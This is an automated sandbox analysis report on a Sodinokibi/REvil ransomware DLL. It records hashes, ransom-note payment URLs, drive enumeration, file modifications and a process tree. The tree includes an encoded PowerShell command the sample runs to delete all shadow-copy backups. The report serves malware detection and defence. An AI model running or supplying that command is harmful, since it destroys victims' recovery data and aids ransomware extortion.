Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
11/05/2024, 20:27
Static task
static1
Behavioral task
behavioral1
Sample
366809d2d9ed25f5cc201660542fa9db_JaffaCakes118.dll
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
366809d2d9ed25f5cc201660542fa9db_JaffaCakes118.dll
Resource
win10v2004-20240508-en
General
-
Target
366809d2d9ed25f5cc201660542fa9db_JaffaCakes118.dll
-
Size
166KB
-
MD5
366809d2d9ed25f5cc201660542fa9db
-
SHA1
9ee1d0ed426c36a0cd5df47d954ca39c892ede35
-
SHA256
f860a3c27f44b98d953d05da28a474945b308a1b83d83ae7e6d4c20d1c06b30b
-
SHA512
04cc3fe1b01b760c8f7f28ecfbb704989252346768656c11fa28878e0738ffcea50c4d023290f8cf61d9e944b3a4312275b34ede0dc8a39c67eb316c40d54592
-
SSDEEP
3072:JLFrb30BRtBZZg+i2ayyYOCWGPyLydrkxMT3QlGLMlPso:NJ0BXScFyfC3Hd4ygMS0
Malware Config
Extracted
C:\Users\vxc5y43-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/488A02A80B01158F
http://decryptor.cc/488A02A80B01158F
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\G: rundll32.exe -
Drops file in Program Files directory 26 IoCs
description ioc Process File opened for modification \??\c:\program files\CompressReceive.pps rundll32.exe File opened for modification \??\c:\program files\ConvertFromSync.mpg rundll32.exe File opened for modification \??\c:\program files\GroupRestart.wma rundll32.exe File opened for modification \??\c:\program files\ResetPing.TTS rundll32.exe File opened for modification \??\c:\program files\SelectSync.xlsm rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\vxc5y43-readme.txt rundll32.exe File opened for modification \??\c:\program files\EditSubmit.xhtml rundll32.exe File opened for modification \??\c:\program files\GrantMerge.M2TS rundll32.exe File opened for modification \??\c:\program files\OutTrace.vst rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\vxc5y43-readme.txt rundll32.exe File opened for modification \??\c:\program files\BlockSet.wmf rundll32.exe File opened for modification \??\c:\program files\GetUnpublish.aifc rundll32.exe File opened for modification \??\c:\program files\JoinExpand.mp2 rundll32.exe File opened for modification \??\c:\program files\RevokeOpen.odt rundll32.exe File opened for modification \??\c:\program files\UpdateBackup.htm rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\vxc5y43-readme.txt rundll32.exe File created \??\c:\program files\vxc5y43-readme.txt rundll32.exe File opened for modification \??\c:\program files\FormatCheckpoint.css rundll32.exe File opened for modification \??\c:\program files\SearchInitialize.otf rundll32.exe File opened for modification \??\c:\program files\SearchSplit.wmv rundll32.exe File opened for modification \??\c:\program files\ClearConvertTo.asx rundll32.exe File opened for modification \??\c:\program files\PushDisconnect.easmx rundll32.exe File created \??\c:\program files (x86)\vxc5y43-readme.txt rundll32.exe File opened for modification \??\c:\program files\CompareSync.sql rundll32.exe File opened for modification \??\c:\program files\DebugSearch.emz rundll32.exe File opened for modification \??\c:\program files\LimitMove.cr2 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1968 rundll32.exe 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1968 rundll32.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeBackupPrivilege 2496 vssvc.exe Token: SeRestorePrivilege 2496 vssvc.exe Token: SeAuditPrivilege 2496 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2236 wrote to memory of 1968 2236 rundll32.exe 28 PID 2236 wrote to memory of 1968 2236 rundll32.exe 28 PID 2236 wrote to memory of 1968 2236 rundll32.exe 28 PID 2236 wrote to memory of 1968 2236 rundll32.exe 28 PID 2236 wrote to memory of 1968 2236 rundll32.exe 28 PID 2236 wrote to memory of 1968 2236 rundll32.exe 28 PID 2236 wrote to memory of 1968 2236 rundll32.exe 28 PID 1968 wrote to memory of 2860 1968 rundll32.exe 29 PID 1968 wrote to memory of 2860 1968 rundll32.exe 29 PID 1968 wrote to memory of 2860 1968 rundll32.exe 29 PID 1968 wrote to memory of 2860 1968 rundll32.exe 29 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\366809d2d9ed25f5cc201660542fa9db_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\366809d2d9ed25f5cc201660542fa9db_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3056
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD52e0a5b7d1282314e0ce5b8f3904781e1
SHA135f8e155fb9ceeb06b64efb7323303b4ed112de0
SHA256533dceea4d5155e0b03294a563642690018edd5aae165635b07fc98627a1e8b0
SHA5120d306b78e20775aa6a22a6cb0bf949c909c4651815f89ad68a7d06a393285abb2ec3114e363f32a6faf32186a3e755b4d4951da677e789ad86fdc66a25c59f00